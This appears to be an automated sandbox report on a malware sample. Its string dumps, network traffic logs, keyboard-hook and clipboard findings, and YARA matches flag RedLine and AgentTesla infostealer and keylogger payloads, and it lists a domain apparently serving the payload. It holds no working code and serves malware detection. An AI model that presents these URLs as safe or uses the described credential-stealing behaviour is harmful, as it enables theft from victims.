                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: x.exe, x.exe, 00000003.00000002.1753574596.0000000021905000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1759764048.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1752975519.0000000021700000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003028000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.000000000302C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000000.1719344100.0000000000416000.00000002.00000001.01000000.00000007.sdmp, xrbjyllC.pif, 0000000B.00000000.1826114660.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, sgxIb.exe, 0000000D.00000002.1890633912.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 0000000D.00000000.1888350846.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, xrbjyllC.pif, 00000011.00000002.2937816421.0000000025B6E000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000000.1995988945.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, 00000012.00000002.2055006675.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 00000012.00000000.2054308600.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe.9.dr, xrbjyllC.pif.3.drString found in binary or memory: http://www.pmail.com
                  Source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/
                  Source: x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/-
                  Source: Cllyjbrx.PIF, 00000010.00000002.2030287886.0000000020F7D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/origins/233_Cllyjbrxmng
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/origins/233_CllyjbrxmngHA
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/origins/233_CllyjbrxmngZ
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com/origins/233_Cllyjbrxmngy
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.0000000000669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com:443/origins/233_Cllyjbrxmng
                  Source: x.exe, 00000003.00000002.1721962152.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://himalayastrek.com:443/origins/233_CllyjbrxmngP
                  Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: unknown | HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49751 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49752 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, SKTzxzsJw.cs | .Net Code: _71ZRqC1D
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif | Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif | Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif | Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif | Window created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif | Window created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif | Window created: window name: CLIPBRDWNDCLASS
                  Source: Yara match | File source: Process Memory Space: x.exe PID: 4888, type: MEMORYSTR

                  System Summary

                  Source: 9.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 17.1.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 17.1.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
